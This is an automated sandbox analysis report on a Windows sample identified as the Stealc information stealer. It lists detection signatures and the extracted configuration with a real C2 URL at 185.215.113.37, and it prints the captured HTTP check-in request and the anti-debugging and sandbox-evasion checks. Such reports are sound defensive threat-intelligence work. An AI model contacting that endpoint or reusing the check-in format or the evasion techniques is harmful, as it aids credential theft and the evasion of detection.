Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1523176
MD5:564e5677e7262707df20c3ea7f110513
SHA1:be8c6288b0baf0bd470e6ab8174e85c03470e0f5
SHA256:8ed1f28fe0588fd7e27b22329ba5c2cbed9bf6aeec4e2e4dbe2cf751f2f1d629
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1520 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 564E5677E7262707DF20C3EA7F110513)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2024949095.0000000004E60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 1520JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 1520JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.130000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T08:19:58.612159+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.130000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/EVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/wsVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpyVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/2Virustotal: Detection: 16%Perma Link
                Multi AV Scanner detection for submitted file
                Source: file.exeVirustotal: Detection: 42%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0013C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00137240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00137240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00139AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00139AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00139B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00139B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00148EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00148EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00144910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00144910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0013DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0013E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0013ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00144570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00144570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0013DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0013BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013F68A FindFirstFileA,0_2_0013F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0013F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00143EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00143EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001316D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 31 41 31 35 35 39 32 32 44 46 35 31 36 36 30 34 39 33 34 38 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 2d 2d 0d 0a Data Ascii: ------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="hwid"31A155922DF51660493485------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="build"doma------AAKKKEBFCGDBGDGCFHCB--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00134880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 31 41 31 35 35 39 32 32 44 46 35 31 36 36 30 34 39 33 34 38 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 2d 2d 0d 0a Data Ascii: ------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="hwid"31A155922DF51660493485------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="build"doma------AAKKKEBFCGDBGDGCFHCB--
                Source: file.exe, 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2066181737.0000000001068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2066181737.0000000001068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/2
                Source: file.exe, 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/E
                Source: file.exe, 00000000.00000002.2066181737.0000000001089000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2066181737.0000000001068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2066181737.0000000001068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy
                Source: file.exe, 00000000.00000002.2066181737.0000000001068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E0_2_0050502E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FA96E0_2_004FA96E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059897F0_2_0059897F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005081790_2_00508179
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004DE9980_2_004DE998
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059EA280_2_0059EA28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003DAAB90_2_003DAAB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00503A910_2_00503A91
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050BBCB0_2_0050BBCB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052DBE30_2_0052DBE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FFC280_2_004FFC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00509CB00_2_00509CB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FC5300_2_004FC530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00471D9F0_2_00471D9F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004135AA0_2_004135AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F8E2A0_2_004F8E2A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050EE3E0_2_0050EE3E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005016EC0_2_005016EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FE6A10_2_004FE6A1
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 001345C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: xlnfjtas ZLIB complexity 0.994943263011432
                Source: file.exe, 00000000.00000003.2024949095.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00149600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00149600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00143720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00143720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\GMD8PWSD.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeVirustotal: Detection: 42%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1858048 > 1048576
                Source: file.exeStatic PE information: Raw size of xlnfjtas is bigger than: 0x100000 < 0x19f800

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.130000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xlnfjtas:EW;vyivhryn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xlnfjtas:EW;vyivhryn:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00149860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00149860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1d245e should be: 0x1d1922
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: xlnfjtas
                Source: file.exeStatic PE information: section name: vyivhryn
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043D84A push 7795C047h; mov dword ptr [esp], eax0_2_0043D8D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043D84A push 1EDDFD7Dh; mov dword ptr [esp], edx0_2_0043D946
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052A840 push 7727F62Ah; mov dword ptr [esp], eax0_2_0052A8F8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014B035 push ecx; ret 0_2_0014B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00565873 push 5E08C7F6h; mov dword ptr [esp], ecx0_2_00565892
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00565873 push esi; mov dword ptr [esp], 3B8B728Fh0_2_005658AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00565873 push 06DFA860h; mov dword ptr [esp], ecx0_2_005658C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051501C push 5E736F00h; mov dword ptr [esp], ecx0_2_005152F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051501C push eax; mov dword ptr [esp], 71142E46h0_2_005153B1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051501C push 2F3BD2ECh; mov dword ptr [esp], esp0_2_005153BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00612830 push ebp; mov dword ptr [esp], 63442BE3h0_2_00612844
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059A007 push ebp; mov dword ptr [esp], eax0_2_0059A046
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00528023 push ecx; ret 0_2_00528032
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push 3F46C75Bh; mov dword ptr [esp], ecx0_2_00505094
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push edx; mov dword ptr [esp], esi0_2_005050AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push eax; mov dword ptr [esp], 34E66A17h0_2_005050AE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push 6ACE5AC1h; mov dword ptr [esp], edi0_2_0050510E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push 1AE8FEADh; mov dword ptr [esp], ebx0_2_0050520A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push 47A536D2h; mov dword ptr [esp], edx0_2_00505252
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push 60FBF841h; mov dword ptr [esp], eax0_2_00505284
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push 50A5D974h; mov dword ptr [esp], eax0_2_005052C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push eax; mov dword ptr [esp], 64E5AAC7h0_2_0050536F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push 1E33956Bh; mov dword ptr [esp], ebp0_2_005053BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push 29B6DF8Fh; mov dword ptr [esp], ebp0_2_005053D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push ebp; mov dword ptr [esp], 269D697Fh0_2_005053D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push edx; mov dword ptr [esp], 20A8104Eh0_2_005053FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push ebp; mov dword ptr [esp], 7BF381B2h0_2_00505409
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push ecx; mov dword ptr [esp], ebx0_2_00505469
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push ecx; mov dword ptr [esp], ebp0_2_00505478
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push 311C4054h; mov dword ptr [esp], edx0_2_005054C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050502E push 2743A6D9h; mov dword ptr [esp], ecx0_2_005054FB
                Source: file.exeStatic PE information: section name: xlnfjtas entropy: 7.954276086869488

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00149860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00149860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13608
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 513034 second address: 51303E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5B4D24B716h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 502CD7 second address: 502CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5B4C774D8Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 513564 second address: 513568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5136B6 second address: 5136C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5B4C774D86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5136C0 second address: 5136CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5136CA second address: 5136DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5136DC second address: 5136E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007F5B4D24B716h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
